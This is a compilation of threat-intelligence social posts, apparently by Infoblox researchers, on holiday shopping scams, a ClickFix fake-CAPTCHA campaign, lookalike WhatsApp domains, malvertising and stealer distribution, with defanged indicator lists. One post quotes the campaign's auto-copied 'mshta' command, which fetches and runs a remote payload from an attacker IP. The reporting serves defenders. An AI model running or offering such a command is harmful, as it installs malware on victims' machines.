🎁 Holiday Gift or Holiday Grift?

As we head toward the season of giving, it seems we've been on the receiving end of some tempting offers on luxury brand items including bags and watches.

"Step right up, bargains galore!?"

✉️ Unsolicited emails flaunting tempting deals with subjects like:

- [Black Friday 2025] Elevate Every Moment – Luxury Watches from $250
- [Black Friday 2025] Elevate Your Style – Louis Vuitton Bags from $200

🔗 Links in these emails use punycode (xn--) internationalized domain names, with Cyrillic text unrelated to the brand they impersonate.

➡️ These domains redirect to, or load resources from, a handful of '.com' domains that do a reasonable job of mimicking the sleek style of luxury brand websites.

💰 As in our earlier post, the checkout process is a familiar tale - passing your PII and payment card details through an intermediate domain which attempts to take payment via a legitimate payment gateway.

Email punycode/IDN examples:
🚫 xn--80aaae9btead2a[.]xn--p1ai
🚫 xn--80aclvcqeaduhb[.]xn--p1ai
🚫 xn--90ahaa0atead2a[.]xn--p1ai
🚫 xn--90askabadrf6a[.]xn--p1ai

Redirect/resource examples:
🚫 lsrox[.]com
🚫 lux-lvs[.]com

Payment intermediate example:
🚫 topcccbook[.]online

Tempted to treat a loved one, or 'bag' yourself a bargain? Whether it's a knockoff or nothing at all, 'watch' out - the only thing you'll be unwrapping is another scam!

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #blackfriday #thanksgiving #holidays

🐾 Paws for thought before shopping this Black Friday!

Black Friday pet food deals might be nothing to sniff at, but watch out for scammers looking to claw at your money.

Alongside the many retail and holiday-themed domains we're tracking, we've seen domains impersonating legit pet food brands (like Royal Canin) with deals many would want to wolf down.

Here's the scam:

- You're browsing for pet food bargains and end up landing on a fake shop offering huge discounts, like one of these lookalikes:

🐶 royalcaninblackfriday[.]com
🐱 royalcaninwebshop[.]com

- You decide to stock up on tasty holiday treats for your furry friend and are prompted to enter your name, address and contact details to 'register' with the site — perhaps only slightly *phishy* so far?

- At checkout, you're prompted to enter your card details, which are passed on in cleartext to a secondary domain with no obvious link to the brand — examples include:

🚫 lesmonaque[.]top
🚫 sincerelytay[.]top

These payment domains often rotate while the fake storefront stays the same, likely to evade detection by the payment gateways they're abusing.

So not only do you risk having your personal and payment card details snaffled by the scammer, they'll also attempt to charge you for goods you're unlikely to receive!

The impact of these scams can be huge — Europol’s recent Operation “Chargeback” uncovered fraud networks causing losses in the hundreds of millions. Different scam, same playbook: stolen card data and abuse of payment systems at scale.

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #blackfriday #thanksgiving #europol

https://www.europol.europa.eu/media-press/newsroom/news/operation-chargeback-43-million-cardholders-affected-eur-300-million-in-damages

Cloudflare Scrubs Aisuru Botnet from Top Domains List

https://krebsonsecurity.com/2025/11/cloudflare-scrubs-aisuru-botnet-from-top-domains-list/

#InternetofThings(IoT) #ALittleSunshine #CloudflareRadar #DDoS-for-Hire #AlexGreenland #MatthewPrince #WebFraud2.0 #GoogleApple #ReneeBurton #CloudFlare #microsoft #Infoblox #Aisuru #Amazon #Epi

Cloudflare Scrubs Aisuru Botnet from Top Domains List - For the past week, domains associated with the massive Aisuru botnet have repeatedly usur... https://krebsonsecurity.com/2025/11/cloudflare-scrubs-aisuru-botnet-from-top-domains-list/ #internetofthings(iot) #alittlesunshine #cloudflareradar #ddos-for-hire #alexgreenland #matthewprince #webfraud2.0 #googleapple #reneeburton #cloudflare #microsoft #infoblox #aisuru #amazon #epi

"I'm not a robot" == "Definitely malware" 🤖

We found an active Clickfix campaign, launched in the last month or so, abusing Cloudflare Pages to host fake CAPTCHA and cookie acceptance pages that drops an unknown form of infostealer. In at least one case, we were able to decipher the auto-copied command to be `mshta http://162[.]252.198[.]122/u88n.db`. `mshta` is an oft-abused, legitimate Windows binary, designed to execute Microsoft HTML Application files. Abusing `mshta` in this way is known as a Living off the Land technique, which aids attackers by avoiding possibly suspicious external processes.

IOCs:
complete-it[.]pages[.]dev
194bffb8[.]complete-it[.]pages[.]dev
3508823b[.]complete-it[.]pages[.]dev
4a203a1c[.]complete-it[.]pages[.]dev
5024b712[.]complete-it[.]pages[.]dev
c2bdad14[.]complete-it[.]pages[.]dev
zallw194bffb8[.]complete-it[.]pages[.]dev

complete-step[.]pages[.]dev

consentandverify[.]pages[.]dev
4020d48f[.]consentandverify[.]pages[.]dev
8a80115d[.]consentandverify[.]pages[.]dev
8df7b42f[.]consentandverify[.]pages[.]dev
93d809cd[.]consentandverify[.]pages[.]dev
b8554ed7[.]consentandverify[.]pages[.]dev
ef57b901[.]consentandverify[.]pages[.]dev

consentcookies-verify[.]pages[.]dev

cookiesconsent-and-verify[.]pages[.]dev

cookiesconsent-verify[.]pages[.]dev

cookiesverify-consent[.]pages[.]dev

katdening1[.]pages[.]dev
41d9cc03[.]katdening1[.]pages[.]dev
49c9b97a[.]katdening1[.]pages[.]dev
5cf5132b[.]katdening1[.]pages[.]dev
65436c2d[.]katdening1[.]pages[.]dev
6b18b8ec[.]katdening1[.]pages[.]dev
9a9a4fab[.]katdening1[.]pages[.]dev
b3d195d9[.]katdening1[.]pages[.]dev
knf9u6m4jt[.]katdening1[.]pages[.]dev
naqsb49c9b97a[.]katdening1[.]pages[.]dev

pass-and-verify[.]pages[.]dev
17bd8c89[.]pass-and-verify[.]pages[.]dev
8bbd8571[.]pass-and-verify[.]pages[.]dev
a0c3581a[.]pass-and-verify[.]pages[.]dev
ae16927d[.]pass-and-verify[.]pages[.]dev

pass-to-verify[.]pages[.]dev
0979aa8e[.]pass-to-verify[.]pages[.]dev
18d5944f[.]pass-to-verify[.]pages[.]dev
1beb85a1[.]pass-to-verify[.]pages[.]dev
41aef6ed[.]pass-to-verify[.]pages[.]dev
5741263c[.]pass-to-verify[.]pages[.]dev
58716364[.]pass-to-verify[.]pages[.]dev
616b5904[.]pass-to-verify[.]pages[.]dev
7b57b9c5[.]pass-to-verify[.]pages[.]dev
7d9238bb[.]pass-to-verify[.]pages[.]dev
860e3d0e[.]pass-to-verify[.]pages[.]dev
959b6110[.]pass-to-verify[.]pages[.]dev
cbe42471[.]pass-to-verify[.]pages[.]dev
d3f8f8b3[.]pass-to-verify[.]pages[.]dev
f0d62d80[.]pass-to-verify[.]pages[.]dev

verify-and-pass[.]pages[.]dev

verify-to-go[.]pages[.]dev

References:
https://www.virustotal.com/gui/url/70f19132038c44e0dc9ef09ec24ae7d5e52d3958ee2ee78590e027fbbe3c44d7 (the auto-copied URL)
https://www.shodan.io/host/162.252.198.122
https://urlscan.io/result/019a038d-fcef-724a-9155-8d88af50a0ac/
https://urlscan.io/result/019a0350-7624-710f-a0b2-114ca46f1733/

#infoblox #dns #clickfix #cloudflare #malware #infosec

When your "privacy browser" comes with a built-in surveillance suite, it's probably not about privacy.  Our latest research, in collaboration with UNODC, exposes Vault Viper. You might recognize them as "Baoying Group". They are running one of Asia's largest iGaming networks, BBIN, servicing scam centres and cyber-enabled fraud networks across the region.

At the center is the Universe Browser, promoted as a "privacy" and "anti-censorship" tool for illegal online gambling. In reality, it's a high-risk surveillance and exploitation platform designed to bypass detections, proxy access, and maintain persistent access across what we estimate to be millions of devices.

DNS analysis from Infoblox reveals tens of thousands of domains tied to Vault Viper's vast infrastructure, exposing a unique DNS fingerprint and operational control over their own corner of the internet.

But the story does not end here:  BBIN is linked to dozens of commercial ventures - they even had their own airline !  

👉 Read the full report here : https://blogs.infoblox.com/threat-intelligence/vault-viper-high-stakes-hidden-threats/

👉 We spoke to Wired to explain how cybercrime evolved : https://www.wired.com/story/universe-browser-malware-gambling-networks/

#CyberThreatIntel #Infoblox #DNS #VaultViper #riskware #Cybercrime #SoutheastAsia #threatintel #threatintelligence #cybersecurity #infosec #infobloxthreatintel #scam #tds #shazhupan #pigbutchering #malware

📬 Vault Viper Leak: Der „Universe Browser“, der alles mitliest
#DarkCommerce #ITSicherheit #Cybermafia #Infoblox #MaëlLeTouz #OnlineGambling #UniverseBrowser #UNODC #VaultViper https://sc.tarnkappe.info/2f9424

The Universe Browser routes all internet traffic through servers in China and “covertly installs several programs that run silently in the background,” according to new findings from network security company Infoblox. The researchers say the “hidden” elements include features similar to malware—including “key logging, surreptitious connections,” and changing a device’s network connections.

https://www.wired.com/story/universe-browser-malware-gambling-networks/

#cyber #security #china #browser #infoblox #malware

When one trick isn't enough… this actor brings the whole toolbox.

Actors start mixing techniques like a cyber cocktail:

- Cloud abuse with AWS S3 lures
- Algorithmically generated (RDGAs) for agility and evasion
- Redirect chains to keep analysts guessing
- TDS filtering to target victims
- Social engineering with fake alerts ("Your cloud storage is full!") or irresistible offers ("Get Netflix for free!")
- Payment scams as the final sting

Here's how it works: The actor is leveraging SMS messages to lure victims into clicking links that point to Amazon S3 buckets. The SMS links are the initial redirection point, silently forwarding the victim to the first bulk registered (RDGA) domain. The redirection is seamless, making it difficult for the victim to notice anything suspicious.

From there, the actor uses multiple RDGA algorithms to generate domains that host scam and scareware campaigns. These domains feature a variety of deceptive themes, such as fake Netflix promotions, "Your Cloud Storage is Full" alerts, or "Failed Payment" warnings.

Once the victim clicks, the redirection chain continues through custom TDS (Traffic Distribution System) domains—also powered by RDGA—before finally landing on a fraudulent payment gateway. Here, victims are tricked into subscribing to fake antivirus products, counterfeit Netflix accounts, or other bogus services.

The top left and right sections showcase different types of lures used in the attack, while the bottom section illustrates how the victim is redirected to rogue payment gateways.

IOCs
protectionsessionactivities[.]top
scanner-detected-protection-network[.]top
internetadvancedsecuritysession[.]autos
detectedservicesoftwareissue[.]autos
cleanalertsafe[.]top
cleanalertsafequick[.]top
cleansafedevicefix[.]top
clean-alert-safe-quick[.]top
quicksaferiskfree[.]top
safe-install-free-faster[.]top
safeinstallfreefaster[.]top
securedsafeservicesecurity[.]autos
quicksaferisk[.]top

#Infoblox #dns #adtech #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel #tds #scam

WhatsApp, doc?

We recently observed about 800 lookalike domains impersonating WhatsApp. These domains are all on the .com, .cc, and .cn TLDs and exhibit a few naming patterns:

Randomized short .cc domains:
- whatsqgs[.]cc, whatsqka[.]cc, whatsqys[.]cc

Structured .com domains:
- app-<3 letters>-whatshktw[.]com
- app-<3 letters>-whatsappcc[.]com

Structured .cn domains:
- <4 letters>-wahtsapp[.]cn

These domains were all created within the last 20 days, tops, and given the bulk registration and consistent infrastructure, point to a coordinated campaign. All 800+ domains are hosted in ASN 205960 (KR, 'IP Transit'), share the same nameserver domain (domainnamedns[.]com), and embed a highly-suspicious Chinese analytics loader from aizhantj[.]com (seriously, this thing is weird; check the references below). The sites present fake WhatsApp login/download portals in Chinese, suggesting East-Asian targeting.

Selection of IOCs
app-xfn-whatsappcc[.]com
app-xbb-whatsappcc[.]com
app-wum-whatshktw[.]com
ptjh-wahtsapp[.]com
kemc-wahstapp[.]cn
hzfv-wahstapp[.]cn
iiqu-wahstapp[.]cn
ggeu-wahstapp[.]cn
whatsyuy[.]cc
xjdp-wahstapp[.]cn
yaue-wahstapp[.]cn
zvxd-wahstapp[.]cn

References
https://urlscan.io/result/0199f335-4b61-76ca-851f-c832a7d5f9bd/#transactions (tj.js is the weird analytics GET request)
https://urlscan.io/result/0199f34a-e9a8-7788-a057-29a6c9a3f133 (the loader itself)
https://www.shodan.io/search?query=aizhantj.com

#infoblox #phishing #lookalikes #infosec #threatintel #dns #whatsapp

@shaft

Today it was due to #aws and #infoblox DNS issues.

It's annoying to wake up Friday motivated to wrap up your week's threat hunting, but instead getting derailed because a quick Google search gives you extra work...

All we wanted to do was make an address change... so a quick search for "o2 address change".

The top results were not to the official site but to 02support[.]info and 02official[.]com. sigh.

The one time there isn't an AI summary to scroll past, it is because there is a scam paying to replace it...

Here's some scans and images.

O2: https://urlscan.io/result/0199cdf0-688f-70ac-bae9-84cdf3d565fa
O2: https://urlscan.io/result/0199cdf0-6327-7531-969e-88adda6cf256
EE: https://urlscan.io/result/0199cdf0-8457-773c-8851-b3ecca7000f4
Tesco Mobile: https://urlscan.io/result/0196c3d2-5fdc-71bd-9d4d-89585de0559f
Vodafone: https://urlscan.io/result/01994ca7-3f24-7743-9aaf-d9a670f0fb01

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #scam

Pig butchering scams - also called sha zhu pan - have gained a lot of attention over the last few years. People know these investment scams are connected to human trafficking, but it is less recognized how they relate to illegal gambling and offshore shell companies.

All of this fuels a massive criminal economy.

Thankfully, long-con scam operations on the internet often leave a strong DNS fingerprint. This enables us to connect physically identified scam compounds to domains - it's always the DNS! ;)

https://blogs.infoblox.com/threat-intelligence/pig-butchering-scams-and-their-dns-trail-linking-thr…

#dns #threatintelligence #shazhupan #crypto #cybersecurity #threatintel #pigbutchering #scam #infoblox

We recently unraveled a mystery involving ~30k infected websites, DNS TXT records, and Strela Stealer #malware distribution. A threat actor who has been around since at least Feb 2020 has evolved to distribute malware through misdirection and a complex relay system, leaving defenders unsure where the actual malware is hosted.
And to top it off, we found that part of the campaigns were sent via REM proxy, another threat actor we track via DNS that leverages compromised MikroTik routers. These campaigns were spam messages targeting #german speakers with malicious .svg files.
The attachments had links pointing to the first stage of the malware -- or did it? It turns out the threat actor, which we track as Detour Dog, is playing mind games. That link actually triggers server-side DNS queries and the fun begins.
Here is the paper: https://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/
More nuggets in the replies.

#malware #infostealer #dns #threatintel #cybersecurity #cybercrime #scam #helptds #tds #infosec #infoblox #strelastealer #phishing #spam #remproxy

Teamwork makes the dream work! The Black Lotus Labs team at Lumen Technologies has published a new report detailing the infrastructure behind the SystemBC botnet and its role in powering the illicit Rem Proxy service. This service allows threat actors to mask their identities behind compromised MikroTik routers deployed in homes and offices worldwide, enabling a range of email and password-based attacks.
Through our collaboration, we’ve confirmed with high confidence that this is the same botnet we reported on back in January. Excellent work, Black Lotus Labs — great investigating!
Read their full report: https://blog.lumen.com/systembc-bringing-the-noise/
#Infoblox #botnet #dns #phishing #spam #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel #scam

We've been observing a trend on Steam involving Chinese-language accounts leaving spam comments on random user's profiles. They range from commenting single emojis to sentences in Chinese that translate to "we should play games together." Upon investigation, these accounts often link to domains that redirect to malicious content.

One such domain, 3pq[.]cc, redirected to a fake chat app interface designed to mimic a messaging platform hosted on jimuzhou[.]top. The messages eventually gave a link to trwonr[.]top, an adult-themed survey page. After completing the survey, it prompted visitors to download an APK file that requested access to invasive permissions, hosted on cxrcedu[.]com.

A pivot on one of the URLs revealed thousands of related domains, all exhibiting similar behavior and infrastructure.

Sample IOCs:
3pq[.]cc
jimuzhou[.]top
trwonr[.]top
cxrcedu[.]com

#Infoblox #dns #rdga #spam #scam #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel

⚠️Researchers expose Vane Viper, a massive malvertising network linked to PropellerAds that posed as legitimate adtech while spreading malware and scams on a global scale. 👀

Read: https://hackread.com/vane-viper-malvertising-adtech-global-scams/

#CyberSecurity #Malvertising #Infoblox #VaneViper

Spammers be spamming. But some may lay low for several months before kicking off their operations.

In late August, we started to observe an influx of a spam campaign targeting Japanese users and impersonating popular companies such as American Express, Amazon and SBI, attempting to phish victims for their credit card and other account information. This was almost a year after the actor first created their domains in September 2024.

This is a technique commonly used by threat actors to avoid detection by security teams, since a lot of attention is usually given to domains that are newly registered. The strategy is to lay low for some time, allowing them to slip under the radar before initiating their operations and remain undetected when they do so.

The actor(s) waited until the domains were close to expiring to start using them in the campaign. They have now renewed several of these domains and, well... that may suggest they intend to continue their activities.

The emails usually contain an action button or a fake url that redirects to links under domains with the pattern <5 to 10 random letters>.cn. Some of the email subjects, along with their translations, are:
-【SBIポイント進呈】ご利用状況に応じた特典をぜひご確認ください — [SBI Points Award] Please Check Your Benefits Based on Usage
- [American Express] カードの利用が一時停止されました — [American Express] Card Usage Has Been Temporarily Suspended
-【お知らせ】カード認証更新のお願い — [Notice] Request to Update Card Authentication

Sample of domains: ehpkmn[.]cn, exttyo[.]cn, qdtqq[.]cn, rnsxk[.]cn, sxviius[.]cn, tyslq[.]cn, wbwfm[.]cn

#Infoblox #dns #phishing #spam #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel #japan #rdga #scam

Aeza Group is still alive and kicking. Following their July sanction, the operators of bulletproof hosting provider Aeza began to migrate some of their infrastructure to a new ASN they created (AS211522 - Hypercore Ltd). However, they're still primarily operating from their original ASN and registering new domains every day. Some recent domains registered in late July/early August on two dedicated Aeza IPs host fake Russian-language download pages for Windows, Chrome, Minecraft, etc. These pages lure users into downloading malicious executable and torrent files that ultimately attempt to steal the user's credentials from web browsers. Some files dropped by these domains were previously associated with Black Basta and Cobalt Strike in May and July 2025.

Sample domains: windows-download[.]net, drivers-windows[.]com, chrome-downloads[.]net, minecraft-game[.]net

#Infoblox #dns #malware #phishing #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel

Wanna play a game?
Reboot now… or in five minutes?

Help TDS - a notorious traffic distribution system - has a fresh new illusion — a fake system alert that sets the stage before the tech support scam begins.

It’s not just a pop-up; it’s full-screen psychological priming, blurred just enough to slip past security tools. You’re given a “choice”, but either way, the curtain rises.

Click either button and the show begins: a spoofed full-screen Microsoft virus alert, and a phone number that offers an immediate fix.

The real trick? Victims are already convinced it’s real before the scam even loads.

#Infoblox #dns #phishing #tds #scam #scareware #helptds #threatintel #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #TechSupportScam #ScamAlert #DontDialTheNumber